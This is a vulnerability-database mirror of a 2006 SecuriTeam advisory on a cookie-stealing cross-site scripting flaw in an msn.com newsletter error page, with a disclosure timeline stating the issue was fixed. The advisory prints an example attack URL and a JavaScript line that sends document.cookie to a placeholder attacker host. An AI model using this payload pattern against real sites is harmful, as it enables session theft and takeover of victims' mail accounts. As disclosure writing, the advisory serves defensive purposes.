Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

msnXSSCB.txt

🗓️ 26 Jul 2006 00:00:00Reported by securiteam.comType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 39 Views

A cookie-stealing Cross-site scripting vulnerability on MSN website led to potentially accessing a victim's Inbox. Resolved within a week of disclosure

Code
`Summary  
-------  
A cookie-stealing Cross-site scripting vulnerability was found on MSN's   
website (msn.com). Using this vulnerability, an attacker could potentially   
gain access to a victim's Inbox.  
  
This vulnerability was discovered by: tontonq and Nir Goldshlager.  
  
Disclosure timeline  
-------------------  
SecuriTeam was asked to assist the researchers with contacting Microsoft.  
  
Reported to vendor: 18th of July, 2006.  
Vendor response: 18th of July, 2006.  
Resolved: 19th of July, 2006.  
Public disclosure: 25th of July, 2006.  
  
Technical description  
---------------------  
A cookie-stealing XSS issue was discovered on MSN's web site.  
  
Example of the issue:  
http://newsletters.msn.com/hm/HMError.asp?CB=http://yourcookiestealer/stealer.js  
That error page gets the CB variable into a script tag.  
  
If John Doe wanted to steal a victim's cookie, he could use this example   
Javascript   
code:  
i=new/**/Image();i.src='http://his_stealer/s.php?cookie='+document.cookie;  
  
As such, if for example, s.php stores the cookie variable somewhere, the   
attacker can set that stored cookie and "jump" to the Inbox.  
  
For illustration, an older similar issue from 2005 on hotmail.com discovered   
by Alex de Vries can be found here:  
http://www.net-force.nl/files/articles/hotmail_xss/  
  
About SecuriTeam's Assisted Disclosure  
--------------------------------------  
Many researchers do not have the time, energy or inclination to deal with   
reporting a vulnerability to vendors.  
  
SecuriTeam is here to help. If you want us to handle the logistics of   
contacting and following up with the vendor, making sure the problem is   
fixed, contact: [email protected].  
  
Our end goal is Full Disclosure, preferably in coordination with the vendor,   
without exposing the researcher to unnecessary risk.  
We do not believe in hiding or selling vulnerabilities. Never had, never will.  
  
All credit will be properly attributed. If asked we can act as proxies,   
keeping your privacy and anonymity.  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
26 Jul 2006 00:00Current
7.4High risk
Vulners AI Score7.4
msncross-site scriptingvulnerabilityinbox accessdisclosuresecuriteam
39